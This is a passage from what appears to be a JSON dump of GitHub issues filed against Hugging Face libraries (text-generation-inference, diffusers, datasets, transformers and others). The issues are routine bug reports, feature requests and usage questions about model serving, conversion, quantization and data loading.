\"/opt/conda/lib/python3.9/site-packages/text_generation_server/models/flash_causal_lm.py\", line 813, in generate_token\r\n out = self.forward(\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/models/flash_causal_lm.py\", line 789, in forward\r\n return self.model.forward(\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/models/custom_modeling/flash_llama_modeling.py\", line 475, in forward\r\n hidden_states = self.model(\r\n File \"/opt/conda/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1501, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/models/custom_modeling/flash_llama_modeling.py\", line 428, in forward\r\n cos, sin = self.layers[0].self_attn.rotary_emb.get_cos_sin(\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/utils/layers.py\", line 470, in get_cos_sin\r\n self._update_cos_sin_cache(dtype, position_ids.device, max_s)\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/utils/layers.py\", line 501, in _update_cos_sin_cache\r\n newbase = self.base * ((self.scaling_factor * seq_len / self.max_position_embeddings) - (self.scaling_factor - 1)) ** (self.dim / (self.dim - 2))\r\nNameError: name 'seq_len' is not defined\r\n```\r\n\r\n2. Looks like typo in the code, should it have been `seqlen` instead of `seq_len` ?\r\n\r\n\r\n3. When I am using the above model without RoPE scaling on 8xA100-40GB GPUs, it can churn out 1534 tokens per sec, with an prompt heavy set up of ~883 input tokens, ~76 output tokens(best_of=1, so no hidden output tokens) per request. \r\nIs this expected performance or can I do better on the above set up?\r\nFYI: tried fp16 on vllm, gptq(4bit), bitsandbytes(8bit) models all ended up with similar TPS (tokens per second). \r\n", "url": "https://github.com/huggingface/text-generation-inference/issues/782", "state": "closed", "labels": [], "created_at": "2023-08-07T05:58:14Z", "updated_at": "2023-09-06T13:59:36Z", "user": "hrushikesh198" }, { "repo": "huggingface/transformers.js", "number": 238, "title": "[Question] Can you list all available models using tranformers.js?", "body": "Hey \ud83d\udc4b \r\n\r\nI was wondering if it's possible to list available models using the `transformers.js` package? \r\n\r\ne.g. \r\n> pipeline.getAvailableModels()\r\n", "url": "https://github.com/huggingface/transformers.js/issues/238", "state": "closed", "labels": [ "question" ], "created_at": "2023-08-07T01:53:35Z", "updated_at": "2023-08-13T23:27:55Z", "user": "sambowenhughes" }, { "repo": "huggingface/chat-ui", "number": 389, "title": "Inject assistant message in the begining of the chat", "body": "Hey, is it possible to start a conversation with an assistant message showing up as the first message in the chat?", "url": "https://github.com/huggingface/chat-ui/issues/389", "state": "closed", "labels": [ "enhancement", "question" ], "created_at": "2023-08-06T17:25:25Z", "updated_at": "2023-09-18T12:52:16Z", "user": "matankley" }, { "repo": "huggingface/diffusers", "number": 4494, "title": "How to convert a diffuser pipeline of XL to checkpoint or safetensors", "body": "I need to fine-tune stable diffusion unet or something like that. Then I have to convert the pipeline into ckpt for webui usage.\r\nBefore I use the `scripts/convert_diffusers_to_original_stable_diffusion.py` for transforming. \r\nBut currently it cannot convert correctly for XL pipeline and webui may raise bugs.\r\nThanks in advance.", "url": "https://github.com/huggingface/diffusers/issues/4494", "state": "closed", "labels": [ "stale", "contributions-welcome" ], "created_at": "2023-08-06T13:06:54Z", "updated_at": "2023-11-06T04:42:19Z", "user": "FeiiYin" }, { "repo": "huggingface/chat-ui", "number": 388, "title": "Is it down?", "body": "It doesnt load for me also your website", "url": "https://github.com/huggingface/chat-ui/issues/388", "state": "closed", "labels": [], "created_at": "2023-08-06T08:54:47Z", "updated_at": "2023-08-08T06:05:48Z", "comments": 6, "user": "BenutzerEinsZweiDrei" }, { "repo": "huggingface/transformers.js", "number": 237, "title": "[Question] Ipynb for ONNX conversion?", "body": "Could you please share the code you're using to convert models to onnx? I know you say in your cards you're using Optimum, but when I try to do it myself, I get much larger onnx files (talking about disk space here) and I don't know what I'm doing wrong.", "url": "https://github.com/huggingface/transformers.js/issues/237", "state": "closed", "labels": [ "question" ], "created_at": "2023-08-06T08:45:19Z", "updated_at": "2023-08-06T09:17:02Z", "user": "Mihaiii" }, { "repo": "huggingface/transformers.js", "number": 233, "title": "[Docs] Mention demo (GitHub pages) in Readme ", "body": "I love your old demo page on GitHub pages (https://xenova.github.io/transformers.js/), as one can easily play with the models and copy code if needed.\r\nIs there any reason it's not mentioned anymore (or not more visible) in the Readme? \r\n\r\n(Sorry, added bug label accidentally, should be question instead)", "url": "https://github.com/huggingface/transformers.js/issues/233", "state": "closed", "labels": [ "question" ], "created_at": "2023-08-04T10:53:48Z", "updated_at": "2023-12-06T15:01:38Z", "user": "do-me" }, { "repo": "huggingface/datasets", "number": 6120, "title": "Lookahead streaming support?", "body": "### Feature request\r\n\r\nFrom what I understand, streaming dataset currently pulls the data, and process the data as it is requested.\r\nThis can introduce significant latency delays when data is loaded into the training process, needing to wait for each segment.\r\n\r\nWhile the delays might be dataset specific (or even mapping instruction/tokenizer specific)\r\n\r\nIs it possible to introduce a `streaming_lookahead` parameter, which is used for predictable workloads (even shuffled dataset with fixed seed). As we can predict in advance what the next few datasamples will be. And fetch them while the current set is being trained.\r\n\r\nWith enough CPU & bandwidth to keep up with the training process, and a sufficiently large lookahead, this will reduce the various latency involved while waiting for the dataset to be ready between batches.\r\n\r\n### Motivation\r\n\r\nFaster streaming performance, while training over extra large TB sized datasets\r\n\r\n### Your contribution\r\n\r\nI currently use HF dataset, with pytorch lightning trainer for RWKV project, and would be able to help test this feature if supported.", "url": "https://github.com/huggingface/datasets/issues/6120", "state": "open", "labels": [ "enhancement" ], "created_at": "2023-08-04T04:01:52Z", "updated_at": "2023-08-17T17:48:42Z", "comments": 1, "user": "PicoCreator" }, { "repo": "huggingface/diffusers", "number": 4459, "title": "how to convert a picture to text embedding, without training these image model like Textual Inversion", "body": "clip text: tokens -> text_embedding -> text_features\r\nclip img: img -> img_embedding -> img_features\r\n\r\nhow inversion without training every time: img -> text_embedding", "url": "https://github.com/huggingface/diffusers/issues/4459", "state": "closed", "labels": [ "stale" ], "created_at": "2023-08-04T01:46:25Z", "updated_at": "2023-09-12T15:03:45Z", "user": "yanchaoguo" }, { "repo": "huggingface/datasets", "number": 6116, "title": "[Docs] The \"Process\" how-to guide lacks description of `select_columns` function", "body": "### Feature request\n\nThe [how to process dataset guide](https://huggingface.co/docs/datasets/main/en/process) currently does not mention the [`select_columns`](https://huggingface.co/docs/datasets/main/en/package_reference/main_classes#datasets.Dataset.select_columns) function. It would be nice to include it in the guide.\n\n### Motivation\n\nThis function is a commonly requested feature (see this [forum thread](https://discuss.huggingface.co/t/how-to-create-a-new-dataset-from-another-dataset-and-select-specific-columns-and-the-data-along-with-the-column/15120) and #5468 #5474). However, it has not been included in the guide since its implementation by PR #5480.\r\n\r\nMentioning it in the guide would help future users discover this added feature.\n\n### Your contribution\n\nI could submit a PR to add a brief description of the function to said guide.", "url": "https://github.com/huggingface/datasets/issues/6116", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-08-03T13:45:10Z", "updated_at": "2023-08-16T10:02:53Z", "user": "unifyh" }, { "repo": "huggingface/diffusers", "number": 4453, "title": "How to convert diffusers SDXL lora into safetensors that works with AUTO1111 webui", "body": "### Describe the bug\n\nI trained a lora on SDXL with this diffusers script: https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_sdxl.py\r\n\r\nI get great results when using the output .bin with the diffusers inference code.\r\nHow can I convert the .bin to .safetensors that can be loaded in AUTO1111 webui?\n\n### Reproduction\n\nTrain a lora on SDXL with this diffusers script: https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_sdxl.py\r\nThe lora model cannot be loaded in AUTO1111 webui\n\n### Logs\n\n_No response_\n\n### System Info\n\nPython 3.10\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/4453", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2023-08-03T11:23:25Z", "updated_at": "2023-09-12T15:03:46Z", "user": "wangqyqq" }, { "repo": "huggingface/text-generation-inference", "number": 765, "title": "How to benchmark a warmed local model by docker", "body": "### System Info\n\nUsing the docker run to connected local model and it worked:\r\n`docker run --rm --name tgi --runtime=nvidia --gpus all -p 5001:5001 -v data/nfs/gdiist/model:/data k8s-master:5000/text-generation-inference:0.9.3 --model-id /data/llama-7b-hf --hostname 0.0.0.0 --port 5001 --dtype float16 `\r\n```\r\n2023-08-03T09:14:08.564776Z INFO text_generation_launcher: Starting Webserver\r\n2023-08-03T09:14:08.587895Z WARN text_generation_router: router/src/main.rs:165: Could not find a fast tokenizer implementation for /data/llama-7b-hf\r\n2023-08-03T09:14:08.587942Z WARN text_generation_router: router/src/main.rs:168: Rust input length validation and truncation is disabled\r\n2023-08-03T09:14:08.587953Z WARN text_generation_router: router/src/main.rs:193: no pipeline tag found for model /data/llama-7b-hf\r\n2023-08-03T09:14:08.595313Z INFO text_generation_router: router/src/main.rs:212: Warming up model\r\n2023-08-03T09:14:11.767661Z INFO text_generation_router: router/src/main.rs:221: Connected\r\n\n\n### Information\n\n- [X] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [X] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nAnd I can't use the `text-generation-benchmark` so I entered the Docker container and using the following command\uff1a\r\n`docker exec -it tgi /bin/bash`\r\n`text-generation-benchmark --tokenizer-name data/nfs/gdiist/model/llama-7b-hf`\r\nThere are errors reported as follows\uff1a\r\n```\r\n2023-08-03T09:23:25.437223Z INFO text_generation_benchmark: benchmark/src/main.rs:126: Loading tokenizer\r\n2023-08-03T09:23:25.437552Z INFO text_generation_benchmark: benchmark/src/main.rs:135: Downloading tokenizer\r\n2023-08-03T09:23:26.218104Z ERROR cached_path::cache: /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/cached-path-0.6.1/src/cache.rs:559: ETAG fetch for https://huggingface.co/data/nfs/gdiist/model/llama-7b-hf/resolve/main/tokenizer.json failed with fatal error \r\nthread 'main' panicked at 'called `Result::unwrap()` on an `Err` value: \"Model \\\"data/nfs/gdiist/model/llama-7b-hf\\\" on the Hub doesn't have a tokenizer\"', benchmark/src/main.rs:147:78\r\nnote: run with `RUST_BACKTRACE=1` environment variable to display a backtrace\r\nAborted (core dumped)\r\n\r\nI want to know if it's the reason for using the local model or the lack of parameters\uff1f\n\n### Expected behavior\n\n1. Help me using benchmark tool after docker run\r\n2. Tell me how to use 2 gpus to run a local model in docker run\r\n\r\nThanks\uff01", "url": "https://github.com/huggingface/text-generation-inference/issues/765", "state": "closed", "labels": [], "created_at": "2023-08-03T09:28:07Z", "updated_at": "2023-10-16T01:50:10Z", "user": "Laych7" }, { "repo": "huggingface/diffusers", "number": 4448, "title": "Outpainting results from diffusers' StableDiffusionControlNetPipeline is much worse than those from A1111 webui. How to improve?", "body": "I am trying to outpaint some human images (mainly the lower-body part) with SD 1.5 conditioned on ControlNet's inpainting and openpose. I have been using A1111 webui with ControlNet extension and it has been working quite well:\r\nHere are my settings in the webui:\r\n\"Screenshot\r\n![1691046578453](https://github.com/huggingface/diffusers/assets/50854238/8baf5891-6fe8-4006-bce9-bca903a3d6bf)\r\n\"Screenshot\r\n\r\nNote that 2 ControlNet units are enabled, one for OpenPose and one for ControlNet's inpainting model. For OpenPose I enabled \"Preview as Input\" and upload my custom json file with all joints defined (although the lower-body joints are not visible in the input image).\r\nHere is the result I get from the webui, which looks good:\r\n![00001-2019210750](https://github.com/huggingface/diffusers/assets/50854238/491a2de1-180c-473d-83d0-44376c4cc7f1)\r\n\r\nNow, I'm trying to reproduce this result using diffusers' StableDiffusionControlNetPipeline. Below is my code:\r\n\r\n\r\n\r\n```\r\nimport numpy as np\r\nfrom diffusers import StableDiffusionControlNetPipeline, ControlNetModel, DDIMScheduler\r\nimport torch\r\nfrom diffusers.utils import load_image\r\nimport cv2\r\nfrom PIL import Image\r\n\r\ndef make_inpaint_condition(image, image_mask):\r\n image = np.array(image.convert(\"RGB\")).astype(np.float32) / 255.0\r\n image_mask = np.array(image_mask.convert(\"L\")).astype(np.float32)\r\n assert image.shape[0:1] == image_mask.shape[0:1], \"image and image_mask must have the same image size\"\r\n image[image_mask < 128] = -1.0 # set as masked pixel\r\n image = np.expand_dims(image, 0).transpose(0, 3, 1, 2)\r\n image = torch.from_numpy(image)\r\n return image\r\n\r\n\r\ncontrolnet_inpaint = ControlNetModel.from_pretrained('lllyasviel/control_v11p_sd15_inpaint', \r\n torch_dtype=torch.float16)\r\ncontrolnet_openpose = ControlNetModel.from_pretrained('lllyasviel/control_v11p_sd15_openpose', \r\n torch_dtype=torch.float16)\r\npipe = StableDiffusionControlNetPipeline.from_pretrained('runwayml/stable-diffusion-v1-5', \r\n controlnet=[controlnet_inpaint, controlnet_openpose], \r\n torch_dtype=torch.float16, \r\n safety_checker=None).to('cuda')\r\npipe.scheduler = DDIMScheduler.from_config(pipe.scheduler.config)\r\npipe.enable_model_cpu_offload()\r\npipe.enable_xformers_memory_efficient_attention()\r\n\r\n\r\n \r\noriginal_image = load_image('./image.png')\r\nmask_image = load_image('./mask.png')\r\ninpaint_condition_image = make_inpaint_condition(original_image, mask_image)\r\nopenpose_condition_image = load_image('./pose.png')\r\ngenerated_img = pipe(prompt=\"best quality, photorealistic, empty background\", \r\n negative_prompt=\"lowres, bad hands, bad feet, worst quality\",\r\n num_inference_steps=20,\r\n guidance_scale=10.0,\r\n image=[inpaint_condition_image, openpose_condition_image]).images[0]\r\n\r\ngenerated_img.save('./test.png') \r\n```\r\n\r\nand here is the result I get from diffusers:\r\n![test (17)](https://github.com/huggingface/diffusers/assets/50854238/59fe3240-2650-4d9e-a46f-4359b368dc93)\r\n\r\nThe legs look much less realistic and the background is kind of noisy. I have been using the same SD model (sd v1.5), same controlnet models (v1.1 for OpenPose and inpainting), and same sampler (DDIM), but the results from diffusers are much worse than the webui. What can I do to reproduce the results I get from the webui?\r\n\r\nIt also seems that with the diffusers pipeline, the unmasked part is also slightly modified. Is there any post-processing applied to it?", "url": "https://github.com/huggingface/diffusers/issues/4448", "state": "closed", "labels": [], "created_at": "2023-08-03T07:19:12Z", "updated_at": "2023-08-30T05:35:03Z", "user": "xiyichen" }, { "repo": "huggingface/transformers", "number": 25280, "title": "How to download files from HF spaces", "body": "### System Info\n\ngoogle colab \n\n### Who can help?\n\n@sanchit-gandhi @rock\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\ni tried:\r\n```\r\nfrom huggingface_hub import hf_hub_download,hf_hub_url\r\n# model_path = hf_hub_download(repo_id=\"xinyu1205/recognize-anything\", filename=\"tag2text_swin_14m.pth\", local_dir = \"/content\")\r\n```\r\nbut throws an error repo not present\r\n\n\n### Expected behavior\n\ndownload the file", "url": "https://github.com/huggingface/transformers/issues/25280", "state": "closed", "labels": [], "created_at": "2023-08-03T07:02:03Z", "updated_at": "2023-09-11T08:02:40Z", "user": "andysingal" }, { "repo": "huggingface/diffusers", "number": 4445, "title": "How to finetune lora model ?", "body": "**Is your feature request related to a problem? Please describe.**\r\nA clear and concise description of what the problem is. Ex. I'm always frustrated when [...]\r\nIf I have a model from civitai , how to finetune it in sd1.5 and sdxl?\r\n\r\n**Describe the solution you'd like**\r\nA clear and concise description of what you want to happen.\r\n\r\n**Describe alternatives you've considered**\r\nA clear and concise description of any alternative solutions or features you've considered.\r\n\r\n**Additional context**\r\nAdd any other context or screenshots about the feature request here.\r\n", "url": "https://github.com/huggingface/diffusers/issues/4445", "state": "closed", "labels": [ "stale" ], "created_at": "2023-08-03T01:55:15Z", "updated_at": "2023-09-12T15:03:49Z", "user": "kelisiya" }, { "repo": "huggingface/sentence-transformers", "number": 2268, "title": "How to chop up a long document into chunks of max sequence length?", "body": "Given a long document, how do I chop it up into chunks so that each chunk is within the [max sequence length](https://www.sbert.net/examples/applications/computing-embeddings/README.html#input-sequence-length) of a model? ", "url": "https://github.com/huggingface/sentence-transformers/issues/2268", "state": "open", "labels": [], "created_at": "2023-08-02T16:50:09Z", "updated_at": "2023-08-04T18:47:22Z", "user": "siddhsql" }, { "repo": "huggingface/dataset-viewer", "number": 1602, "title": "Parallel steps update incoherence", "body": "See the discussion https://huggingface.co/datasets/BelleGroup/multiturn_chat_0.8M/discussions/1#64c9e88a6a26cddbecd9bec6\r\n\r\nBefore the dataset update, the `split-first-rows-from-parquet` response was a success, and thus the `split-first-rows-from-streaming` response, computed later, is a `ResponseAlreadyComputedError` error.\r\n\r\nBut after the dataset update, the `split-first-rows-from-parquet` response was an error (due to a disk issue: ` FileSystemError`) and, due to a heavy load on the infra, the `split-first-rows-from-streaming` response has not been processed yet, so: it's still `ResponseAlreadyComputedError`.\r\n\r\nPossibilities:\r\n1. remove `ResponseAlreadyComputedError`, and copy the response (doubles storage)\r\n2. change the model for parallel steps, and store only once. Let's say we have M+N parallel steps. If M steps are successful (normally with the same response) and N steps are erroneous, let's store the optional successful response content once, and all the responses, removing the success content for successful responses. It is a lot of complexity.\r\n3. keep the logic, but if a parallel step gives an error whereas it had a successful response before AND the other parallel step is `ResponseAlreadyComputedError`, copy the successful answer to the other step. Seems brittle and overly complex.\r\n4. keep the logic, but if a parallel step gives an error whereas it had a successful response before AND the other parallel step is `ResponseAlreadyComputedError`, delete the other answer\r\n\r\nNone seems like a good idea. Do you have better ideas @huggingface/datasets-server ?", "url": "https://github.com/huggingface/dataset-viewer/issues/1602", "state": "closed", "labels": [ "bug", "question", "P1" ], "created_at": "2023-08-02T13:44:35Z", "updated_at": "2024-02-06T14:52:06Z", "user": "severo" }, { "repo": "huggingface/transformers", "number": 25264, "title": "[Question] How to load AutoFeatureExtractor on GPU?", "body": "Hi, I am following this guide to learn how to do audio classification with wav2vec2: https://huggingface.co/docs/transformers/main/tasks/audio_classification\r\n\r\nI intend to extract features of my data with the following codes\r\n```\r\nfeature_extractor = AutoFeatureExtractor.from_pretrained(\"/workspace/models/wav2vec2-large-robust\")\r\n\r\ndef preprocess_function(examples):\r\n audio_arrays = [x[\"array\"] for x in tqdm(examples[\"audio\"])]\r\n inputs = feature_extractor(\r\n audio_arrays, sampling_rate=feature_extractor.sampling_rate, max_length=16000, truncation=True\r\n )\r\n return inputs\r\n\r\nencoded_audio_dataset_train = audio_dataset_train.map(preprocess_function, remove_columns=\"audio\", batched=True)\r\n```\r\nBut it seems the extractor is loaded to CPU instead of GPU, and I didn't find in documentation how to set the device for loading feature extractor. I assume the feature extraction is done by the wav2vec2 model itself right? If so how to do this on GPU? Or is it mentioned in any documentation that I didn't notice? \r\n\r\nThis is my first time to use transformers library in audio processing so please forgive my clumsiness. \r\n\r\nAny help is much appreciated.", "url": "https://github.com/huggingface/transformers/issues/25264", "state": "closed", "labels": [], "created_at": "2023-08-02T12:26:20Z", "updated_at": "2023-09-11T08:02:43Z", "user": "treya-lin" }, { "repo": "huggingface/datasets", "number": 6111, "title": "raise FileNotFoundError(\"Directory {dataset_path} is neither a `Dataset` directory nor a `DatasetDict` directory.\" )", "body": "### Describe the bug\n\nFor researchers in some countries or regions, it is usually the case that the download ability of `load_dataset` is disabled due to the complex network environment. People in these regions often prefer to use git clone or other programming tricks to manually download the files to the disk (for example, [How to elegantly download hf models, zhihu zhuanlan](https://zhuanlan.zhihu.com/p/475260268) proposed a crawlder based solution, and [Is there any mirror for hf_hub, zhihu answer](https://www.zhihu.com/question/371644077) provided some cloud based solutions, and [How to avoid pitfalls on Hugging face downloading, zhihu zhuanlan] gave some useful suggestions), and then use `load_from_disk` to get the dataset object. \r\nHowever, when one finally has the local files on the disk, it is still buggy when trying to load the files into objects. \n\n### Steps to reproduce the bug\n\nSteps to reproduce the bug:\r\n1. Found CIFAR dataset in hugging face: https://huggingface.co/datasets/cifar100/tree/main\r\n2. Click \":\" button to show \"Clone repository\" option, and then follow the prompts on the box:\r\n ```bash\r\n cd my_directory_absolute\r\n git lfs install\r\n git clone https://huggingface.co/datasets/cifar100\r\n ls my_directory_absolute/cifar100 # confirm that the directory exists and it is OK. \r\n ```\r\n3. Write A python file to try to load the dataset\r\n```python\r\nfrom datasets import load_dataset, load_from_disk\r\ndataset = load_from_disk(\"my_directory_absolute/cifar100\")\r\n```\r\nNotice that according to issue #3700 , it is wrong to use load_dataset(\"my_directory_absolute/cifar100\"), so we must use load_from_disk instead. \r\n\r\n4. Then you will see the error reported:\r\n```log\r\n---------------------------------------------------------------------------\r\nFileNotFoundError Traceback (most recent call last)\r\nCell In[5], line 9\r\n 1 from datasets import load_dataset, load_from_disk\r\n----> 9 dataset = load_from_disk(\"my_directory_absolute/cifar100\")\r\n\r\nFile [~/miniconda3/envs/ai/lib/python3.10/site-packages/datasets/load.py:2232), in load_from_disk(dataset_path, fs, keep_in_memory, storage_options)\r\n 2230 return DatasetDict.load_from_disk(dataset_path, keep_in_memory=keep_in_memory, storage_options=storage_options)\r\n 2231 else:\r\n-> 2232 raise FileNotFoundError(\r\n 2233 f\"Directory {dataset_path} is neither a `Dataset` directory nor a `DatasetDict` directory.\"\r\n 2234 )\r\n\r\nFileNotFoundError: Directory my_directory_absolute/cifar100 is neither a `Dataset` directory nor a `DatasetDict` directory.\r\n```\n\n### Expected behavior\n\nThe dataset should be load successfully. \n\n### Environment info\n\n```bash\r\ndatasets-cli env\r\n```\r\n-> results:\r\n```txt\r\n\r\nCopy-and-paste the text below in your GitHub issue.\r\n\r\n- `datasets` version: 2.14.2\r\n- Platform: Linux-4.18.0-372.32.1.el8_6.x86_64-x86_64-with-glibc2.28\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.16.4\r\n- PyArrow version: 12.0.1\r\n- Pandas version: 2.0.3\r\n```", "url": "https://github.com/huggingface/datasets/issues/6111", "state": "closed", "labels": [], "created_at": "2023-08-02T09:17:29Z", "updated_at": "2023-08-29T02:00:28Z", "comments": 3, "user": "2catycm" }, { "repo": "huggingface/transformers", "number": 25257, "title": " how to print out the data loaded by each epoch during trainer.train() training?", "body": "### Feature request\n\nplease tell to me,\r\n how to print out the data loaded by each epoch during trainer.train() training?\n\n### Motivation\n\n how to print out the data loaded by each epoch during trainer.train() training?\n\n### Your contribution\n\n how to print out the data loaded by each epoch during trainer.train() training?", "url": "https://github.com/huggingface/transformers/issues/25257", "state": "closed", "labels": [], "created_at": "2023-08-02T09:13:55Z", "updated_at": "2023-09-11T08:02:47Z", "user": "ahong007007" }, { "repo": "huggingface/tokenizers", "number": 1310, "title": "How to train BPE tokenizer with multiple CPU", "body": "Hi\r\n\r\nI tried to train a BPE tokenizer with about 10GB text, but it seems extremely slow(runs more than 24 hours and not finished yet).\r\n\r\nIs there a way to turn on multi CPU training (from htop there only 1 CPU used)? \r\n\r\n\r\nHere is the code.\r\n```\r\nfrom tokenizers import Tokenizer, decoders, models, normalizers, pre_tokenizers, trainers, processors\r\n\r\ntokenizer = Tokenizer(models.BPE())\r\ntokenizer.normalizer = normalizers.NFC()\r\ntokenizer.pre_tokenizer = pre_tokenizers.ByteLevel(add_prefix_space=False)\r\ntokenizer.post_processor = processors.ByteLevel(trim_offsets=False)\r\ntokenizer.decoder = decoders.ByteLevel()\r\n\r\ntrainer = trainers.BpeTrainer(\r\n vocab_size = 50000,\r\n min_frequency = 1,\r\n initial_alphabet = pre_tokenizers.ByteLevel.alphabet(),\r\n special_tokens = special_tokens\r\n)\r\n\r\nwith open(\"train_bpe.txt\") as f\r\n tokenizer.train(f, trainer=trainer)\r\n```", "url": "https://github.com/huggingface/tokenizers/issues/1310", "state": "closed", "labels": [], "created_at": "2023-08-02T08:14:07Z", "updated_at": "2023-08-02T09:10:44Z", "user": "voidmagic" }, { "repo": "huggingface/chat-ui", "number": 380, "title": "Issue with Text Generation in Stream Mode", "body": "Hi\r\n\r\nThe text generation in stream mode is not functioning as expected on my development server, which is running behind a reverse proxy with the correct base path defined. I'm only receiving a single response in one go, whereas I expect a continuous stream of text.\r\n\r\nPlease assist me in resolving this issue. Thank you!", "url": "https://github.com/huggingface/chat-ui/issues/380", "state": "closed", "labels": [ "support" ], "created_at": "2023-08-01T19:07:50Z", "updated_at": "2023-09-10T12:22:16Z", "comments": 10, "user": "bilal-rachik" }, { "repo": "huggingface/transformers", "number": 25245, "title": "BLIP-2 request: If it's even possible, can you please provide an official example script of how to get the text(caption) features and image features into the same vector space (e.g. for cross-modal retrieval/search using BLIP-2 models, similar to what we can already do with CLIP.) Thanks in advance.", "body": "### System Info\n\nlinux, python 3.8+, pytorch '1.13.0+cu116'\n\n### Who can help?\n\n@sgugger\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nN/A\n\n### Expected behavior\n\nN/A", "url": "https://github.com/huggingface/transformers/issues/25245", "state": "closed", "labels": [], "created_at": "2023-08-01T18:21:07Z", "updated_at": "2023-09-21T08:03:25Z", "user": "wingz1" }, { "repo": "huggingface/dataset-viewer", "number": 1591, "title": "Should we convert the datasets to other formats than parquet?", "body": "One OP asked for CSV conversion (not explicitly from the Hub itself): https://huggingface.co/datasets/medical_questions_pairs/discussions/3#64c8c2af527d76365563285c", "url": "https://github.com/huggingface/dataset-viewer/issues/1591", "state": "closed", "labels": [ "question", "feature request", "P2" ], "created_at": "2023-08-01T13:47:12Z", "updated_at": "2024-06-19T14:19:01Z", "user": "severo" }, { "repo": "huggingface/optimum", "number": 1243, "title": "transformers.convert_graph_to_onnx.quantize equivalent with optimum?", "body": "Historically, I've used the following to quantize a model after training:\r\n\r\n```python\r\nimport sys\r\nfrom pathlib import Path \r\nfrom transformers.convert_graph_to_onnx import quantize\r\n\r\ninput_file = sys.argv[1]\r\nprint(\"Performing quantization of model '{}'\".format(input_file))\r\nquantized_model_path = quantize(Path(input_file))\r\nprint(\"Rename quantized model '{}' to '{}'\".format(quantized_model_path.name, input_file))\r\nquantized_model_path.replace(input_file)\r\n```\r\n\r\nIs there a way to accomplish the same type of quantization using`optimum-cli? The quantize method from above (that is deprecated) produces a much smaller model than optimum-cli. \r\n\r\n```\r\nOriginal model 448M multilingual-e5-small-onnx/model.onnx\r\nModel after above 112M multilingual-e5-small-onnx/model.onnx\r\n```\r\n\r\nI've tried the following export/quantize commands, but the model file size is still above 400MB\r\n\r\n```\r\n$ optimum-cli export onnx --task sentence-similarity -m intfloat/multilingual-e5-small --optimize O3 multilingual-e5-small-onnx\r\n$ optimum-cli onnxruntime quantize --onnx_model multilingual-e5-small-onnx --avx2 --output test\r\n```\r\n\r\n```\r\n403M Aug 1 09:38 test/model_quantized.onnx\r\n```\r\nThank you!", "url": "https://github.com/huggingface/optimum/issues/1243", "state": "closed", "labels": [], "created_at": "2023-08-01T07:59:03Z", "updated_at": "2023-08-01T21:45:46Z", "comments": 2, "user": "jobergum" }, { "repo": "huggingface/sentence-transformers", "number": 2266, "title": "How to measure the quanlity of embeddings?", "body": "I am using `sentence-transformers` to encode the big texts into input embeddings for a text classification task. However, I'm unsure how to compare the quality of embeddings when evaluating multiple models' performance. Could you please provide some advice?", "url": "https://github.com/huggingface/sentence-transformers/issues/2266", "state": "open", "labels": [], "created_at": "2023-08-01T06:59:41Z", "updated_at": "2023-09-01T06:12:39Z", "user": "sgwhat" }, { "repo": "huggingface/trl", "number": 597, "title": "How to run using multi-GPUs?", "body": "Hi, I'm not so familiar with the training method using multi-GPUs.\r\n\r\nI have a machine with 8 A100s, what should I do to full params SFT a llama2-7B model? \r\nHow to use the trl tool?\r\n\r\nThanks.", "url": "https://github.com/huggingface/trl/issues/597", "state": "closed", "labels": [], "created_at": "2023-08-01T06:36:27Z", "updated_at": "2023-08-21T03:39:46Z", "user": "jyC23333" }, { "repo": "huggingface/diffusers", "number": 4407, "title": "how to store hub_download on local directory?", "body": "### Describe the bug\n\nrunning:\r\nfrom huggingface_hub import hf_hub_url, hf_hub_download\r\n```\r\n# Generate/show the URL\r\nhf_hub_url(\r\n repo_id=\"XpucT/Deliberate\",\r\n filename=\"Deliberate-inpainting.safetensors\",\r\n)\r\n\r\n# Download the file\r\nhf_hub_download(\r\n repo_id=\"XpucT/Deliberate\",\r\n filename=\"Deliberate-inpainting.safetensors\",\r\n)\r\n```\r\nbut file is not stored on local directory\n\n### Reproduction\n\nsame as above \n\n### Logs\n\n_No response_\n\n### System Info\n\nkaggle notebook\n\n### Who can help?\n\n@sayakpaul @patrickvonplaten @will", "url": "https://github.com/huggingface/diffusers/issues/4407", "state": "closed", "labels": [ "bug" ], "created_at": "2023-08-01T05:21:39Z", "updated_at": "2023-08-01T05:55:46Z", "user": "andysingal" }, { "repo": "huggingface/datasets", "number": 6108, "title": "Loading local datasets got strangely stuck", "body": "### Describe the bug\n\nI try to use `load_dataset()` to load several local `.jsonl` files as a dataset. Every line of these files is a json structure only containing one key `text` (yeah it is a dataset for NLP model). The code snippet is as:\r\n```python\r\nds = load_dataset(\"json\", data_files=LIST_OF_FILE_PATHS, num_proc=16)['train']\r\n```\r\nHowever, I found that the loading process can get stuck -- the progress bar `Generating train split` no more proceed. When I was trying to find the cause and solution, I found a really strange behavior. If I load the dataset in this way:\r\n```python\r\ndlist = list()\r\nfor _ in LIST_OF_FILE_PATHS:\r\n dlist.append(load_dataset(\"json\", data_files=_)['train'])\r\nds = concatenate_datasets(dlist)\r\n```\r\nI can actually successfully load all the files despite its slow speed. But if I load them in batch like above, things go wrong. I did try to use Control-C to trace the stuck point but the program cannot be terminated in this way when `num_proc` is set to `None`. The only thing I can do is use Control-Z to hang it up then kill it. If I use more than 2 cpus, a Control-C would simply cause the following 